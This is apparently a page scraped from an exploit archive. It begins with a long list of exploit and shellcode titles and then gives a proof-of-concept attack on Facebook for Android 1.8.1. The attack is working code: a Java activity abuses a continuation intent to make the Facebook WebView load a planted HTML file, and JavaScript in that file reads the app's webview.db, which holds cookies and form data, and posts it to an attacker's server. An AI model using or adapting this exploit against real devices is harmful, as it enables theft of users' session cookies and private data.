
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
92 lines
No EOL
3.2 KiB
Text
92 lines
No EOL
3.2 KiB
Text
source: https://www.securityfocus.com/bid/57173/info
|
|
|
|
Facebook for Android is prone to an information-disclosure vulnerability.
|
|
|
|
Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
|
|
|
|
Facebook for Android 1.8.1 is vulnerable; other versions may also be affected.
|
|
|
|
++++++ Attacker's app (activity) ++++++
|
|
|
|
// notice: for a successful attack, the victim user must be logged-in
|
|
// to Facebook in advance.
|
|
public class AttackFacebook extends Activity {
|
|
|
|
// package name of Facebook app
|
|
static final String FB_PKG = "com.facebook.katana";
|
|
|
|
// LoginActivity of Facebook app
|
|
static final String FB_LOGIN_ACTIVITY
|
|
= FB_PKG + ".LoginActivity";
|
|
|
|
// FacebookWebViewActivity of Facebook app
|
|
static final String FB_WEBVIEW_ACTIVITY
|
|
= FB_PKG + ".view.FacebookWebViewActivity";
|
|
|
|
@Override
|
|
public void onCreate(Bundle bundle) {
|
|
super.onCreate(bundle);
|
|
attack();
|
|
}
|
|
|
|
// main method
|
|
public void attack() {
|
|
// create continuation_intent to call FacebookWebViewActivity.
|
|
Intent contIntent = new Intent();
|
|
contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
|
|
// URL pointing to malicious local file.
|
|
// FacebookWebViewActivity will load this URL into its WebView.
|
|
contIntent.putExtra("url", "file:///sdcard/attack.html");
|
|
|
|
// create intent to be sent to LoginActivity.
|
|
Intent intent = new Intent();
|
|
intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
|
|
intent.putExtra("login_redirect", false);
|
|
|
|
// put continuation_intent into extra data of the intent.
|
|
intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
|
|
|
|
// call LoginActivity
|
|
this.startActivity(intent);
|
|
}
|
|
}
|
|
|
|
++++++ Attacker's HTML/JavaScript file ++++++
|
|
|
|
<!--
|
|
attacker's app should put this file to /sdcard/attack.html in advance
|
|
-->
|
|
<html>
|
|
<body onload="doAttack()">
|
|
<h1>attack.html</h1>
|
|
<script>
|
|
// file path to steal. webview.db can be a good target for attackers
|
|
// because it contains cookies, formdata etc.
|
|
var target = "file:///data/data/com.facebook.katana/databases/webview.db";
|
|
|
|
// get the contents of the target file by XHR
|
|
function doAttack() {
|
|
var xhr1 = new XMLHttpRequest();
|
|
xhr1.overrideMimeType("text/plain; charset=iso-8859-1");
|
|
xhr1.open("GET", target);
|
|
xhr1.onreadystatechange = function() {
|
|
if (xhr1.readyState == 4) {
|
|
var content = xhr1.responseText;
|
|
// send the content of the file to attacker's server
|
|
sendFileToAttackerServer(content);
|
|
// for debug
|
|
document.body.appendChild(document.createTextNode(content));
|
|
}
|
|
};
|
|
xhr1.send();
|
|
}
|
|
|
|
// Send the content of target file to the attacker's server
|
|
function sendFileToAttackerServer(content) {
|
|
var xhr2 = new XMLHttpRequest();
|
|
xhr2.open("POST", "http://www.example.jp/";);
|
|
xhr2.send(encodeURIComponent(content));
|
|
}
|
|
</script>
|
|
</body>
|
|
</html> |